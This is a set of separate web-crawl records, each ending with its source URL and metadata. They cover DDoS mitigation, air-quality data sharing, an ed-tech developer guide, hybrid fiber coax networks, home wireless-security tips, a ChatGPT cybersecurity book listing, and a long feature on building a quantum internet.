Monitoring web traffic and having an accurate idea about what regular traffic looks like, and what is abnormal traffic, can also play a vital role in helping to protect against or spotting DDoS attacks. Some security personnel recommend setting up alerts that notify you if the number of requests is above a certain threshold. While this might not necessarily indicate malicious activity, it does at least provide a potential early warning that something might be on the way.
It’s also useful to plan for scale and spikes in web traffic, which is something that using a cloud-based hosting provider can aid with.
Firewalls and routers can play an important role in mitigating the potential damage of a DDoS attack. If configured correctly, they can deflect bogus traffic by analyzing it as potentially dangerous and blocking it before it arrives. However, it’s also import to note that in order for this to be effective, firewall and security software needs to be patched with the latest updates to remain as effective as possible.
Using an IP stresser service can be an effective way of testing your own bandwidth capability. There are also specialist DDoS mitigation service providers that can help organisations deal with a sudden large upsurge in web traffic, helping to prevent damage by attacks.
What is a DDoS mitigation service?
DDoS attack mitigation services protect the network from DDoS attacks by re-routing malicious traffic away from the network of the victim. High profile DDoS mitigation service providers include Cloudflare, Akamai, Radware and many others.
The first job of a mitigation service is to be able to detect a DDoS attack and distinguish what’s actually a malicious event from what’s just a regular, if unusually high, volume of traffic.
Common means of DDoS mitigation services doing this include judging the reputation of the IP the majority of traffic is coming from. If it’s from somewhere unusual or known to be malicious, it could indicate an attack. While another way is looking out for common patterns associated with malicious traffic, often based on what’s been learned from previous incidents.
Once an attack has been identified as legitimate, a DDoS protection service will move to respond by absorbing and deflecting the malicious traffic as much as possible. This is helped along by routing the traffic into manageable chunks that will ease the mitigation process and help prevent denial-of-service.
How do I choose a DDoS mitigation service?
Choosing a DDoS mitigation service isn’t as simple as just selecting the first solution that appears. Organizations will need to choose a service based on their needs and circumstances. For example, a small business probably isn’t going to have any reason to fork out for the DDoS mitigation capabilities required by a global conglomerate.
However, if the organisation looking for a DDoS mitigation service is a large business, then they’re probably correct to look at large overflow capacities to help mitigate attacks. Looking at a network that has two or three times more capacity than the largest attacks known to date should be more than enough to keep operations online, even during a large DDoS attack.
While DDoS attacks can cause disruption from anywhere in the world, the geography and location of a DDoS mitigation service provider can be a factor. When deciding on a service provider, organisations should, therefore, consider the DDoS protection network in their region of the world to be the most effective.
Despite all the ways to potentially prevent a DDoS attack, sometimes attackers will still be successful anyway because if attackers really want to take down a service and have enough resources, they’ll do their best to be successful at it. However, if an organization is aware of the warning signs of a DDoS attack, it’s possible to be prepared for when it happens. | <urn:uuid:7174d4ea-be41-40e0-8ae2-7ad4c1b8be5b> | CC-MAIN-2024-38 | https://www.bvainc.com/2022/01/27/what-is-a-ddos-attack-everything-you-need-to-know-about-distributed-denial-of-service-attacks-and-how-to-protect-against-them/ | 2024-09-19T01:46:55Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651944.55/warc/CC-MAIN-20240918233405-20240919023405-00556.warc.gz | en | 0.955813 | 2,411 | 3.390625 | 3 |
This week marks the 14th annual Air Quality Awareness Week in the U.S.[i] The theme for this year is “Better Air, Better Health!”, which is especially pertinent now. Air pollution is a major cause of death and disease affecting the lungs and heart, killing an estimated seven million people worldwide every year according to the World Health Organization (WHO). The data shows that 90% of people breathe polluted air, the majority of which are in urban areas.[ii] Moreover, recent research shows that areas with higher levels of air pollution may experience more severe impact from pandemics such as COVID-19.[iii] The good news is that lockdowns and remote working are having a massive impact on clearing the air as the before/after photos of Los Angeles, California below illustrate.
Source: Business Insider[iv]
However, that is not expected to last when cities begin to reopen, so imagine if your phone could alert you when the local air quality was unsafe so you could decide whether to stay home or wear a mask to go out. Or, if you are driving, your car could automatically detect air pollution and switch on the air filter while suggesting alternate routes that were less polluted. On the flip side, if governments and businesses are informed when the air quality in their community reaches hazardous levels, they could make better decisions about shutting down or moving to virtual operations until it improves. Getting to this level of insight will require trusted data exchange between multiple parties with governance models that address data privacy concerns. By directly interconnecting multiple parties, a trusted data exchange can generate deeper insights and shared value while keeping data private and safe in transit.
Download the IOA® Data Blueprint
Minimize the risk of data loss and data theft without compromising accessibility. See how to use multicloud application workloads to secure low latency access to data.
Download NowAir quality monitoring in North America
Most governments around the world already have air quality monitoring systems in place. In the U.S. and Canada, the national/federal government captures air quality data from sensors and other monitoring devices, which is publicly shared on their websites.[v] And while these agencies don’t typically push real-time alerts or action recommendations, there are a number of companies developing innovative approaches for delivering intelligent air quality insights to agencies, citizens and businesses in North America. For example: [vi]
- The AIR app by Plume Labs goes beyond the public air quality data provided by the government. It also integrates land-based measurements with satellite imagery and machine learning (ML) models to deliver air quality reports and pollution forecasts. The company also sells a personal air quality sensor that can provide real-time localized air quality information on the app, and this data is fed back into the ML algorithms to improve the accuracy over time.
- The BreezoMeter app provides real-time, location-based air quality data in 90+ countries by collecting data from multiple nearby pollution stations, weather, wind direction/speed, time of day and other factors, combined with ML and artificial intelligence. The app delivers real-time localized air quality information, daily pollen counts, fire alerts and personalized health recommendations based on the insights. BreezoMeter also provides API access for businesses that want to tap into their data and algorithms for smart homes/buildings/cities, connected vehicles, medical devices and wearables and more.
- Air control agencies in several regional districts in Southern California use Envirosuite to monitor air quality and detect pollution sources in real-time. Envirosuite’s platform combines multiple sources of data on air quality, weather, emission rates, altitude and more with atmospheric dispersion ML models to provide precise air quality measurements and pollution forecasts. This enables agencies to respond more quickly with actions and plans to reduce air pollution.
Getting smarter while minding data privacy
Connecting data dots to detect high levels of air pollution in real-time and provide appropriate recommendations and actions is not difficult to solve from a technology point of view. However, it can be more challenging to solve from a regulatory and data privacy perspective. Digital surveillance is not generally accepted in North America except when it is for protecting public safety and even then it can be tricky. For example, in an effort to help track the spread of COVID-19, Apple and Google recently announced a rare joint collaboration to enable Bluetooth-based contact tracing features. And although the smartphone system is opt-in only, collects no location data from users and collects no data at all from anyone without a positive COVID-19 diagnosis, the announcement has still been met with some data privacy pushback.[vii] Alphabet’s Sidewalk Labs encountered similar pushback for its Toronto smart city project and initially scaled back its plans, but has since cancelled the initiative due to added market uncertainty from COVID-19.[viii]
Despite these challenges, data sharing is essential to deliver hyper-local/personalized insights. Notifying a vulnerable population with preexisting lung conditions about air pollution levels requires data to be exchanged between various smart devices across healthcare providers, governments, and the public/private sector. Privacy concerns can be alleviated by through the use of data trusts to establish the right balance between data value and data protection, while private interconnection solutions like those on Platform Equinix® help ensure that any data and insights shared between multiple entities are exchanged safely and securely.
Download the Distributed Data blueprint to learn more.
You may also be interested in reading how Equinix is advancing green design and healthy offices in our latest sustainability report. | <urn:uuid:f63c82e1-6cf9-4a62-bb4d-32718bb804c3> | CC-MAIN-2024-38 | https://blog.equinix.com/blog/2020/05/08/better-air-better-health-in-the-u-s-and-canada-with-ai-iot/ | 2024-09-10T14:38:17Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651255.81/warc/CC-MAIN-20240910125411-20240910155411-00456.warc.gz | en | 0.931241 | 1,142 | 2.71875 | 3 |
Tapping into a booming market, Education Department officials crowdsourced ideas from developers, educators and researchers to put together the “Ed Tech Developer’s Guide: A Primer for Developer, Startups and Entrepreneurs.”
The first manual, unveiled Tuesday by Education Secretary Arne Duncan and Director of Educational Technology Richard Culatta, pinpoints gaps and opportunities to create effective digital tools that can be used in classrooms across the country.
“Technology makes it possible for us to create a different dynamic between a teacher and a classroom full of students. It can open up limitless new ways to engage kids, support teachers and bring parents into the learning process,” Duncan said during the ASU+GSV Summit, dubbed “Davos in the Desert,” in Scottsdale, Arizona.
“We need tools designed to help students discover who they are and what they care about, and tools that create portals to a larger world that, in the past, would have remained out of reach for far too many students,” Duncan continued.
According to the manual, “the demand for high-quality educational apps is increasing as communities become more connected, devices become more affordable, and teachers and parents are looking for new ways to use technology to engage students.”
Yet, it adds, “many existing solutions don’t address the most urgent needs in education.”
The manual encourages teachers and developers to think creatively to create interactive games and methods of teaching math, science, English, social studies and foreign languages rather than “digitizing” content by simply scanning a worksheet.
It also highlights certain apps like SchoolKit, which was created with help from a federal grant and draws on research about growth mindsets, an understanding that ability can be developed, not fixed.
The manual also offers information about appropriate Internet bandwidth for schools, resources to support network infrastructure and how more schools are turning to BYOD – bring your own device – programs.
Culatta said digital learning tools offer a more equitable learning experience for kids.
“Edtech tools have the potential to close the opportunity gap by providing access to rich educational experiences not available in all communities, for example, virtual labs and field trips, advanced coursework, access to field experts, and opportunities to interact with students around the world,” he said. | <urn:uuid:f94323eb-af9c-4046-9aba-66a0ae070799> | CC-MAIN-2024-38 | https://fedscoop.com/education-officials-unveil-new-ed-tech-manual-for-developers-teachers/ | 2024-09-10T13:15:38Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651255.81/warc/CC-MAIN-20240910125411-20240910155411-00456.warc.gz | en | 0.952978 | 486 | 2.9375 | 3 |
This blog post is part of a series called “CommScope Definitions” in which we will explain common terms in communications network infrastructure.
Hybrid fiber coax (HFC) is the term that describes the service delivery architecture used by cable operators and multi-system operators (MSO). The architecture includes a combination of fiber optic cabling and coaxial cabling to distribute video, data and voice content to/from the headend and the subscribers. Typically, the signals are transported from the headend through a hub, to within the last mile via fiber optic cable. As an example, for a service area ranging from 64 homes passed to 1,000* homes, the fiber optic cable ends in an HFC node. At this point, the optical signal is converted into a radio frequency (RF) signal and transmitted over coaxial cable to subscribers’ homes/businesses.
The coaxial cable that enters subscribers’ homes is a flexible, small “drop” cable that will connect directly to the cable modem, the set-top box or other consumer premise equipment. The RF signal on the coaxial cable is strong enough to allow signals to be split in different directions within the home. Sometimes the number of separate devices in the home is so large that amplification may be required. In this instance, a drop amp or house amp is used. Often, the splitters and amplifier are combined to reduce the number of connections.
The term HFC also implies the way in which signals are transported through the network. All HFC networks use frequency division multiplexing to pack the content into the spectrum slots of a cable plant. Spectrum in this case is typically referred to as the frequency bands that carry the content – 52MHz to 1004MHz for the forward, (headend to subscriber), and 5-42MHz for the reverse (subscriber to headend) in the US. Across the globe, spectrum allocations and split frequencies vary. Downstream and upstream are terms also used to describe these bands, respectively.
Signals that originate in the headend that must be transported to the subscriber are either analog or modulated with a scheme called quadrature amplitude modulation (QAM). QAM signals are generated by taking a digital representation of the original signal, whether it is an analog voice or video signal, and converting it by sampling and modulating a carrier. The resulting QAM signal is a high-capacity analog signal, which requires care in maintaining a high level of signal-to-noise ratio (SNR). This contrasts with a digital optical signal as used in GEPON or GPON (gigabit passive optical networks), for which SNR equivalent requirements are much simpler.
The standard that governs QAM transport is managed by CableLabs, a non-profit industry funded R&D organization, and is called Data Over Cable Service Interface Specification, or DOCSIS. Currently, DOCSIS 3.0 is the most widely deployed. The newest version, DOCSIS 3.1, significantly improves the modulation rates and data throughput to subscribers, also expanding the downstream to 1200MHz and beyond, and the upstream to 85MHz and beyond.
So, how do MSOs seamlessly transition HFC to fiber-to-the-home? Stay tuned for another post on successful strategies.
*A significant consideration as to the size of the service area is the amount of bandwidth a subscriber consumes. As each HFC node has a direct connection back to the headend, smaller service areas get access to more data-per-home-passed delivered from the headend. | <urn:uuid:0d9ec925-cad3-4c86-bc14-8ccb51cf0e81> | CC-MAIN-2024-38 | https://www.commscope.com/Blog/CommScope-Definitions-What-is-HFC/ | 2024-09-14T07:55:51Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651559.58/warc/CC-MAIN-20240914061427-20240914091427-00156.warc.gz | en | 0.92071 | 734 | 3.09375 | 3 |
Protecting Wireless Networks
Using a wireless network in your home gives you the convenience of being able to use your computer virtually anywhere in your house — and still be able to connect to other computers on your network or access the Internet. However, if your wireless network is not secure, there are significant risks. For example, a hacker could:
- Intercept any data that you send or receive
- Gain access to your shared files
- Hijack your Internet connection — and use up your bandwidth or download limit
Internet Security tips — to help you protect your wireless network
Here are some simple steps you can take to protect your wireless network and router:
- Avoid using the default password
It’s easy for a hacker to find out the manufacturer’s default password for your wireless router — and then use that password to access your wireless network. So it’s wise to change the administrator password for your wireless router. When you’re deciding on your new password, try to pick a complex series of numbers and letters — and try to avoid using a password that can be guessed easily.
- Don’t let your wireless device announce its presence
Switch off SSID (Service Set Identifier) broadcasting — to prevent your wireless device announcing its presence to the world.
- Change your device’s SSID name
Again, it’s easy for a hacker to find out the manufacturer’s default SSID name for your device — and then use that to locate your wireless network. Change the default SSID name of your device — and try to avoid using a name that can be guessed easily.
- Encrypt your data
In your connection settings, make sure you enable encryption. If your device supports WPA encryption, use that — if not, use WEP encryption.
- Protect against malware and Internet attacks
Make sure you install a rigorous anti-malware product on all of your computers and other devices. In order to keep your anti-malware protection up to date, select the automatic update option within the product. | <urn:uuid:c77d595d-be2b-48b4-9298-6b3d29be47de> | CC-MAIN-2024-38 | https://www.kaspersky.com.au/resource-center/preemptive-safety/protecting-wireless-networks | 2024-09-15T12:49:16Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651630.14/warc/CC-MAIN-20240915120545-20240915150545-00056.warc.gz | en | 0.882214 | 423 | 2.703125 | 3 |
"Mastering Cybersecurity with ChatGPT" by Mohamed Atef explores artificial intelligence (AI) tools, particularly ChatGPT, in cybersecurity. There are numerous cybersecurity books on the market, but this book of computer science provides a comprehensive overview of ChatGPT's capabilities and practical applications in various cybersecurity fields. These domains include threat analysis, incident management, risk mitigation, and policy enforcement.
Cybersecurity is a critical issue in the digital age, as organizations across various industries face increasingly sophisticated cyber threats. To effectively protect against these threats, cybersecurity professionals need to constantly adapt and develop effective strategies and tools to stay ahead of attackers.
Artificial intelligence has emerged as a game-changing tool in cybersecurity, providing advanced analytics capabilities to identify and respond to threats quickly and effectively. One of the most promising AI tools in this area is ChatGPT. In response to various prompts, this language model generates human-like responses.
ChatGPT can be used to enhance cybersecurity. For example, it can be used to analyze threat intelligence, automate incident response, assess and mitigate risks, and enforce security policies and standards. This book explores these applications in detail and includes step-by-step tutorials and real-world examples to help readers understand how to implement ChatGPT effectively in their cybersecurity strategies.
The book is divided into different chapters, each focusing on a specific aspect of cybersecurity. One of the chapters provides an overview of ChatGPT's features and capabilities, as well as the advantages and limitations of AI tools in cybersecurity. The chapter sets the foundation for the rest of the book, providing readers with a basic understanding of ChatGPT's capabilities and practical applications.
Another chapter focuses on threat analysis and how ChatGPT can be used to identify and analyze various cyber threats. The chapter covers different types of threat intelligence, including dark web monitoring, and how ChatGPT can help generate relevant information to mitigate these threats.
The next chapter delves into incident management, explaining how ChatGPT can be used to detect and respond to security incidents effectively. The chapter highlights how ChatGPT can provide real-time alerts, automate incident response, and streamline communication between different teams involved in incident management.
Chapter four explores risk mitigation and how ChatGPT can be used to assess and manage different cybersecurity risks. The chapter covers risk management and how ChatGPT can analyze data and provide actionable insights. This will enable you to mitigate risks effectively.
The following chapter focuses on policy enforcement, discussing how ChatGPT can enforce security policies and standards. The chapter highlights how ChatGPT can help automate compliance checks, monitor policy violations, and provide recommendations to improve compliance.
The next one addresses the ethical implications of AI-driven solutions in cybersecurity, discussing the potential risks and limitations of using AI tools in digital security. The chapter also highlights the importance of transparency, fairness, and accountability in AI-driven solutions.
Finally, the last chapter features case studies and expert advice, demonstrating the impact of AI-driven solutions on the future of the cybersecurity industry. Overall "Mastering Cybersecurity with ChatGPT" is an informative and practical guide for anyone interested in the cybersecurity and AI intersection. The book provides readers with a comprehensive understanding of ChatGPT's capabilities and how it can be used to enhance cybersecurity across various domains.
Only logged in customers who have purchased this product may leave a review. | <urn:uuid:25270dc4-f377-4110-932a-f684841a0de0> | CC-MAIN-2024-38 | https://www.infosec4tc.com/product/mastering-cybersecurity-with-chatgpt-2/ | 2024-09-16T16:04:20Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651697.45/warc/CC-MAIN-20240916144317-20240916174317-00856.warc.gz | en | 0.917901 | 689 | 2.890625 | 3 |
Quantum computers were proposed forty years ago, but have yet to make any real impact in the world. Researchers are struggling to get significant amounts of processing power from systems that have to be kept close to absolute zero.
But at the same time, the quantum informatics community is already hard at work on the next step beyond individual quantum computers: an Internet that can connect them to work together.
You can already communicate with plenty of experimental quantum computers on the Internet. For instance, Amazon’s AWS Braket lets you build and test quantum algorithms on different quantum processors (D-Wave, IonQ, or Rigetti) or use a simulator.
Microsoft does something similar on Azure, and IBM also lets users play with a five-qubit quantum system.
Job done? Well no.
Sharing the output of isolated quantum computers is one thing; linking quantum computers up is something else.
The power of quantum computing is in having a large number of qubits, whose value is not determined till the end of the calculation. If you can link those “live” qubits, you’ve linked the internals of your quantum computers, and you’ve effectively created a bigger quantum computer.
Why link up quantum computers?
“It is hard to build quantum computers large enough to solve really big problems,” explains Vint Cerf, one of the Internet’s founders, in an email exchange with DCD.
The problem is harder because the quantum world creates errors: “You need a lot of physical qubits to make a much smaller number of logical qubits - because error correction requires a lot of physical qubits.”
So, we actually do need to make our quantum computers bigger.
But we want to link “live” qubits, rather than just sharing the quantum computer’s output. We want to distribute the internal states of that computer without collapsing the wave function - and that means distributing entanglement (see box)
The quantum Internet means taking quantum effects and distributing them across a network. That turns out to be very complex - but potentially very powerful.
“Scaling of quantum computers is facilitated by the distribution of entanglement,” says Cerf, who works at Google. “In theory, you can make a larger quantum system if you can distribute entanglement to a larger number of distinct quantum machines.”
There’s a problem though.
There are several approaches to building qubits for the development of quantum computers, including superconducting junctions, trapped-ion quantum computers, and others based on photons. One thing they all have in common is they have to be isolated from the world in order to function.
The qubits have to maintain a state of quantum coherence, in which all the quantum states can exist, like the cat in Schrödinger’s famous paradox that is both alive and dead - as long as the box is kept closed. So how do you communicate with a sealed box?
National quantum Internet
That question is being asked at tech companies like Google, and at Universities round the world. Europe has the Quantum Internet Alliance, a grouping of multiple universities and bodies including QuTech, and the US has Q-Next, the US national quantum information science program, headed by University of Chicago Professor David Awschalom
The US Department of Energy thinks the question is important enough to fund, and has supported projects at Q-Next lead partner, the Argonne National Laboratory. Among its successes, Q-Next has shared quantum states over a 52-mile fiber link which has become the nucleus of a possible future national quantum Internet.
Europe’s QIA has notched up some successes too, including the first network to connect three quantum processors, with quantum information passed through an intermediate node, created at the QuTech institute for quantum informatics.
Another QIA member, the Max Planck Institute, used a single photon to share quantum information - something which is important, as we shall see.
Over at Argonne, Martin Suchara, a scientist from the University of Chicago, has DoE funding for his work on quantum communications. But he echoes the difficulty of transmitting quantum information.
“The no-cloning theorem says, if you have a quantum state, you cannot copy it,” says Suchara. “This is really a big engineering challenge.”
Send for the standards body
With that much work going on, we are beginning to see the start of a quantum Internet.
But apart from the technical difficulty, there’s another danger. All these bodies could create several, incompatible quantum Internets. And that would betray what the original Internet was all about.
The Internet famously operates by “rough consensus and running code.” Engineers make sure things work, and can be duplicated in multiple systems, before setting them in stone.
For 35 years, the body that has ensured that running code has been the Internet Engineering Task Force (IETF). It’s the body that curates standards for anything added to our global nervous system.
Since the dawn of the Internet, the IETF has published standards known as “RFCs” (requests for comment). These define the network protocols which ensure your emails and your video chats can be received by other people.
If we are going to have a quantum Internet, we’ll need an RFC which sets out how quantum computers communicate.
Right now, that’s too blue-sky for the hands-on engineers and protocol designers of the IETF. So quantum Internet pioneers have taken their ideas to the IETF’s sister group, the forward-looking Internet Research Task Force (IRTF).
The IRTF has a Quantum Internet Research Group (QIRG), with two chairs: Rodney Van Meter, a professor at Keio University, Japan; and Wojciech Kozlowski at QuTech in Delft. QIRG has been quietly looking at developments that will introduce completely new ways to do networks.
“It is the transmission of qubits that draws the line between a genuine quantum network and a collection of quantum computers connected over a classical network,” says the QIRG’s document, Architectural Principles for a Quantum Internet. “A quantum network is defined as a collection of nodes that is able to exchange qubits and distribute entangled states amongst themselves.”
The work is creating a buzz. Before Covid-19 made IETF pause its in-person meetings, QIRG get-togethers drew quite an attendance, says Kozlowski, “but it was more on a kind of curiosity basis.”
Building up from fundamentals
The fundamental principle of quantum networking is distributing entanglement (see box), which can then be used to share the state of a qubit between different locations.
Suchara explains: “The trick is, you don't directly transmit the quantum state that is so precious to you: you distribute entanglement. Two photons are entangled, in a well-defined state that basically ties them together. And you transmit one of the photons of the pair over the network.”
He goes on: “Once you distribute the entanglement between the communicating endpoints, you can use what is called quantum teleportation to transmit the quantum state. It essentially consumes the entanglement and transmits the quantum state from point A to point B.”
“The quantum data itself never physically enters the network,” explains Kozlowski. “It is teleported directly to the remote end.”
Kozlowski points out that teleporting qubits is exciting, but distributing entanglement is the fundamental thing.
“For example, quantum key distribution can be run on the entanglement based network without any teleportation, and so can a bunch of other applications. Most quantum application protocols start from saying ‘I have a bunch of states,’ and teleportation is just one way of using these states.”
Towards a quantum Internet protocol
In late 2020, Kozlowski co-authored a paper with colleagues at Delft, proposing a quantum Internet protocol, which sets an important precedent, by placing distributed entanglement into a framework similar to the layered stacks - OSI or TCP/IP - which define communication over classical networks.
“Our proposed stack was heavily inspired by TCP/IP, or OSI.” he tells us. “The definitions of each layer are slightly different, but there was this physical layer at the bottom, which was about attempting to generate entanglement.”
That word “attempting” is important, he says: “It fails a lot of the time. Then we have a link responsible for operating on a single link, between two quantum repeaters or an end node and a quantum repeater. The physical layer will say ‘I failed,’ or ‘I succeeded.’ The link layer would be responsible for managing that to eventually say, ‘Hey, I actually created entanglement for you.’”
The protocol has to keep track of which qubits are entangled on the different nodes, and this brings in a parallel network channel: “One important thing about distributing entanglement is the two nodes that end up with an entangled pair must agree which of their qubits are entangled with which qubits. One cannot just randomly use any qubit that's entangled.
"One has to be able to identify in the protocol, which qubit on one node is entangled with which qubit on the other node. If one does not keep track of that information, then these qubits are useless.”
“Let’s say these two nodes generate hundreds of entangled pairs, but only two of them are destined for a particular application, then that application must get the right qubits from the protocol stack. And those two qubits must be entangled with each other, not just any random qubit at the other node.”
The classical Internet has to transmit coordinating signals like this, but it can put them in a header to each data packet. This can’t happen on the quantum Internet, so “header” information has to go on a parallel channel, over the classical Internet.
“The thing that makes software and network protocols difficult for quantum is that one could imagine a packet which has a qubit as a payload, and has a header. But they never ever travel on the same channel. The qubit goes on the quantum channel, and the header would go on the classical channel.”
It needs a classical channel
“It is a hard requirement to have classical communication channels between all the nodes participating in the quantum network,” says Kozlowski.
In its protocol design, the Delft team took the opportunity to have headers on the classical Internet that don’t correspond to quantum payloads on the quantum Internet, says Kozlowski: “We chose a slightly different approach where the signaling and control messages are not directly coupled. We do have packets that contain control information, just like headers do. What is different, though, is that they do not necessarily have a payload attached to them.”
In practice, this means that the quantum Internet will always need the classical Internet to carry the header information. Every quantum node must also be on the classical Internet.
So a quantum Internet will have quantum information on the quantum plane, and a control plane operating in parallel on the classical Internet, handling the classical data it needs to complete the distribution of qubit entanglement.
Applications on top
The Delft proposal keeps things general, by putting teleportation up at the top, as an application running over the quantum Internet, not as a lower layer service. Kozlowski says earlier ideas suggested including teleportation in the transport layer, but “we have not proposed such a transport layer, because a lot of applications don't even need to teleport qubits.”
The Delft paper proposes a transport layer, which just operates directly on the entangled pair, to deliver services such as remote operations.
Over at Argonne, Suchara’s project has an eye on standards work, and agrees with the principles: “How should the quantum Internet protocol stack look like?” he asks. “It is likely that it will resemble in some way the OSI model. There will be layers and some portion of the protocol at the lowest layer will have to control the hardware.”
Like Kozlowski, he sees the lower layer managing photon detectors and quantum memories in repeater nodes.
Above that, he says, “the topmost layer is the application. There are certain actions you have to take for quantum teleportation to succeed. That's the topmost layer.
“And then there's all the stuff in the middle, to route the photons through the network. If you have a complicated topology, with multiple network nodes, you want to go beyond point to point communication; you want multiple users and multiple applications.
Sorting out the middle layers creates a lot of open questions, says Suchara: “How can this be done efficiently? This is what we would like to answer.”
There is little danger of divergence at this stage, but over in Delft, Kozlowski’s colleagues, including quantum network leader Stephanie Wehner, have actually begun to write code towards an eventual quantum internet. While this article was being written, QuTech researchers published a paper, Experimental Demonstration of Entanglement Delivery Using a Quantum Network Stack. The introduction promises: “Our results mark a clear transition from physics experiments to quantum communication systems, which will enable the development and testing of components of future quantum networks.”
Putting this into practice brings up the next set of problems. Distributing entanglement relies on photons (particles of light), which quantum Internet researchers refer to as “flying qubits,” to contrast them with the stationary qubits in the end system, known as “matter qubits.”
The use of photons sounds reassuring. This is light. It’s the same stuff we send down fiber optic cables in the classical Internet. And one of the major qubit technologies in the lab is based on photons.
But there’s a difference here. For one thing, we’re working on quantum scales. A bit sent over a classical network will be a burst of light, containing many millions of photons. Flying qubits are made up of single (entangled) photons.
“In classical communication, you just encode your bit in thousands of photons, or create extra copies of your bit,” says Suchara. “In the quantum world, you cannot do that. You have to use a single photon to encode a quantum state. And if that single photon is lost, you lose your information.”
Also, the network needs to know if the flying qubit has been successfully launched. This means knowing if entanglement has been achieved, and that requires what the quantum pioneers call a “heralded entanglement generation scheme.”
Working with single photons over optical fiber has limits. Beyond a few km, it’s not possible. So the quantum Internet researchers have come up with “entanglement swapping.” A series of intermediate systems called “quantum repeaters” are set up, so that the remote end of a pair can be repeatedly teleported till it reaches its destination.
This is still not perfect. The fidelity of the copy degrades, so multiple qubits are used and “distilled” in a process called “quantum error correction.”
On one level that simply means repeating the process till it works, says Suchara. “You have these entangled photons and you transmit them. If some portion - even a very large portion - of these entangled pairs is lost, that's okay. You just need to get a few of them through.”
Kozlowski agrees: “The reason why distributed entanglement works, and qubit distribution doesn't work, is because when we distribute entanglement, it's in a known form. It's in what we call Bell states. So if one fails, if one is lost, one just creates it again.”
Quantum repeaters will have to handle error correction and distillation, as well as routing and management.
But end nodes will be more complicated, says Kozlowski. “Quantum repeaters have to generate entanglement and do a bit of entanglement swapping. End nodes must have good capacity for a quantum memory that can hold qubits and can actually perform local processing instructions and operations. In addition to generating entanglement, one can then execute an application on it.”
Dealing with time
Quantum networks will also have to deal with other practical issues like timing. They will need incredible time synchronization because of the way entanglement is generated today.
Generating entanglement is more complicated than sending a single photon. Most proposed schemes send a photon from each end of the link to create an entangled pair at the midpoint.
“The two nodes will emit a photon towards a station that's in the middle,” says Kozlowski. “And these two photons have to meet at exactly the same time in the middle. There's very little tolerance, because the further apart they arrive, the lower quality the entanglement is.”
He is not kidding. Entanglement needs synchronization to nanosecond precision, with sub-nanosecond jitter of the clocks.
The best way to deliver timing is to include it in the physical layer, says Kozlowski. But there’s a question: “Should one synchronize just a link? Or should one synchronize the entire network to a nanosecond level? Obviously, synchronizing an entire network to a nanosecond level is difficult. It may be necessary, but I intuitively would say it's not necessary, I want to limit this nanosecond synchronization to each link.
On a bigger scale, the quantum network has a mundane practical need to operate quickly. Quantum memories will have a short lifetime, as a qubit only lasts as long as it can be kept isolated from the environment.
“In general, one wants to do everything as fast as possible, as well, for the very simple reason that quantum memory is very short-lived,” says Kozlowski.
Networked quantum systems have to produce pairs of Bell states fast enough to get work done before stored qubits decay. But the process of making entangled pairs is still slow. Till that technology improves, quantum networked systems will achieve less, the further they are separated.
“Time is an expensive resource,” says the QIRG document. “Ultimately, it is the lifetime of quantum memories that imposes some of the most difficult conditions for operating an extended network of quantum nodes.
As Vint Cerf says: “There is good work going on at Google on quantum computers. Others are working on quantum relays that preserve entanglement. The big issues are maintaining coherence long enough to get an answer. Note that the quantum network does have speed of light limitations despite the apparent distance-independent character of quantum entanglement. The photons take time to move on the quantum network. If entanglement dissipates with time, then speed of light delay contributes to that.”
Demands of standards
The Internet wouldn’t be the Internet if it didn’t insist on standards. So the QIRG has marked “homogeneity” as a challenge. The eventual quantum Internet, like today’s classical Internet, should operate just as well, regardless of whose hardware you are using.
Different quantum repeaters should work together, and different kinds of quantum computers should be able to use the network, just as the Internet doesn’t tell you what laptop to use.
At the moment, linking different kinds of quantum systems is a goal for the future, says Kozlowski: “Currently, they have to be the same, because different hardware setups have different requirements for what optical interaction they can sustain. When they go on the fiber, they get converted to the telecom frequency, and then it gets converted back when it's on the other end. And the story gets more complicated when one has to integrate between two different setups”
“There is ongoing work to implement technology to allow crosstalk between different hardware platforms, but that's ongoing research work. It’s a goal,” he says. “Because this is such an early stage. We just have to live with the constraints we have. Very often, software is written to address near-term constraints, more than to aim for these higher lofty goals of full platform independence and physical layer independence.”
The communication has also got to be secure. On the classical Internet, security was an afterthought, because the original pioneers like Cerf were working in a close-knit community where everyone knew each other.
With 35 years of Internet experience to refer to, the QIRG is building in security from the outset. Fortunately, quantum cryptography is highly secure - and works on quantum networks, almost by definition.
As well as this, the QIRG wants a quantum Internet that is resilient and easy to monitor.
“I think participation in the standardization meetings, by the scientific community and potential users, is really important,” says Suchara. “Because there are some important architectural decisions to be made - and it's not clear how to make them.”
The quantum Internet will start local. While the QIRG is thinking about spanning kilometers, quantum computing startups can see the use in much smaller networks, says Steve Brierley CEO of Riverlane, a company impatient to hook up large enough quantum computers to do real work.
“The concept is to build well functioning modules, and then network them together,” says Brierley. “For now, this would be in the same room - potentially even in the same fridge.”
That level of networking “could happen over the next five years,” says Brierley. “In fact, there are already demonstrations of that today.”
Apart from anything else, long distance quantum networks will generate latencies. As we noted earlier, that will limit what can be done, because quantum data is very short-lived.
For now, not many people can be involved, says Kozlowski: “The hardware is currently still in the lab, and not really outside.”
But, for the researchers in those labs, Kozlowski says: “There's lots to do,” and the work is “really complicated. Everybody's pushing the limits, but when you want to compare it to the size and scope of the classical Internet, it's still basic.”
Professor Andreas Wallraff at ETH University in Zurich used an actual pipe to send microwave signals between two fridges.
The Max Planck Institute has shown quantum teleportation, to transmit quantum information from a qubit to a lab 50 meters away.
At QuTech Professor Stephanie Wehner has shown a “link layer” protocol, which provides reliable links over an underlying quantum network. And QuTech has demonstrated a quantum network in which two nodes are linked with an intermediate repeater.
Over in the US at Argonne, Suchara is definitely starting small with his efforts at creating reliable communications. He is working on sharing quantum states, and doesn’t expect to personally link any quantum computers just yet.
For him, the first thing is to get systems well enough synchronized to handle basic quantum communications: “With FPGA boards, we already have a clock synchronization protocol that's working in the laboratory. We would like to achieve this clock synchronization in the network - and we think the first year of our project will focus on this.”
Suchara thinks that long-distance quantum computing is coming: “What's going to happen soon is connecting quantum computers that are in different cities, or really very far away."
